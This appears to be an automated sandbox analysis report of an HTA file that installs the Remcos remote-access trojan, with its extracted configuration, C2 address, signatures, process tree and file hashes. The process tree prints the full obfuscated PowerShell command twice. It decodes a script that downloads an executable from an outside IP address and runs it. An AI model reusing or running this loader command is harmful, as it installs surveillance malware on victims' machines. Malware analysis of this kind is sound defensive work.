Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-12-2024 03:13

General

  • Target

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta

  • Size

    142KB

  • MD5

    22ca9f87ffb6d9d3dc9d7e4f151470c7

  • SHA1

    df9bcef5ab55d8a5342bb7747d7936f4fe20afe7

  • SHA256

    6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

  • SHA512

    e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2

  • SSDEEP

    768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2836
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          PID:2832

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9nbkubh7.dll

    Filesize

    3KB

    MD5

    8110369b4913d58f30a9030194c940a9

    SHA1

    2779cbcc810e1c9131b6719623413e94003783af

    SHA256

    e52e6c7fe5ca62bbc133701402d74056bdefbfa9c1482ea208d85d239ffd5764

    SHA512

    a3400402f87b690a1705d0e3e7b1415fb8cf5118be10831fdfa999f9950db9fe02c04ace316a6b05d8589f46ad9dd67df15ab4d68cc7f3fc772c5702ef7f2ba2

  • C:\Users\Admin\AppData\Local\Temp\9nbkubh7.pdb

    Filesize

    7KB

    MD5

    623b34b0b11542173d7afacc1f245194

    SHA1

    d78e417fa305d8b4c8ec34f7916dd5eabed6bca9

    SHA256

    05f3834f9bdd0125f4a88b297e66f6d005dd843bb41c816ddb5dbf682664d360

    SHA512

    cd51afe2825eb936bd54b1ecf198e54c362683dc849e04186ecd4bae3dafbc88cba2d930fdf9a6dd8cb6dc4e759ec748c2dc514e181d85eee1fa8e13cc180d7f

  • C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp

    Filesize

    1KB

    MD5

    1d1077f4fe6effcd680e9469bc69297c

    SHA1

    243294c27f012751b2046bca693566fa6ccb7c09

    SHA256

    84dba55adb984305279022808c924e0728979d7c1b0500bfc3a5dbcb75150b67

    SHA512

    4d53c3a42e68257d6fe032e415ff4ca60257b62e467c67ca7619c78995df796ca9b6ba5301cef22d64446e22965538f1545072edb2c2b9096403d58fd0bd652a

  • \??\c:\Users\Admin\AppData\Local\Temp\9nbkubh7.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline

    Filesize

    309B

    MD5

    aee07cca87aa1776ace9f469ad15a73d

    SHA1

    7d7b93792051018aea6c00d4ee17f2b4b6c5f428

    SHA256

    3d8dcbd6494604eaa16b0f77c4fd7397731a864acd73827646f66476962de650

    SHA512

    83306f22068685877104e291e1ac9fab4ae39d7159bd274b62c85f9636bf615628da7015231da1ab2d792772f36575d3a3846e89124e465755f83b2dafa9c33f

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp

    Filesize

    652B

    MD5

    8456482394366df9e37a3d3751b53fbe

    SHA1

    c4493efa4a4488f4899642f40fb5486789e4bb3a

    SHA256

    792bc9d88e1ad5d6435b2798268660563efd16203dca9579dc61fe98f7eaf3ee

    SHA512

    b0c337636bfc446b7d14120e01447afdd217edc9891c7104106501156cdd4c6d31687afeaf3309a71d902d8167bfb41d85e1afbc6b44daeb720889b736c66c14

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    530KB

    MD5

    c6b0fba610732719435d9621878bc605

    SHA1

    789afce0b2016029215db7cca0ce7c4acfa54b4c

    SHA256

    ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d

    SHA512

    5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933

  • memory/2832-35-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-39-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-34-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-32-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-36-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-37-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-38-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-33-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-40-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-41-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-42-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-43-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-44-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2832-45-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB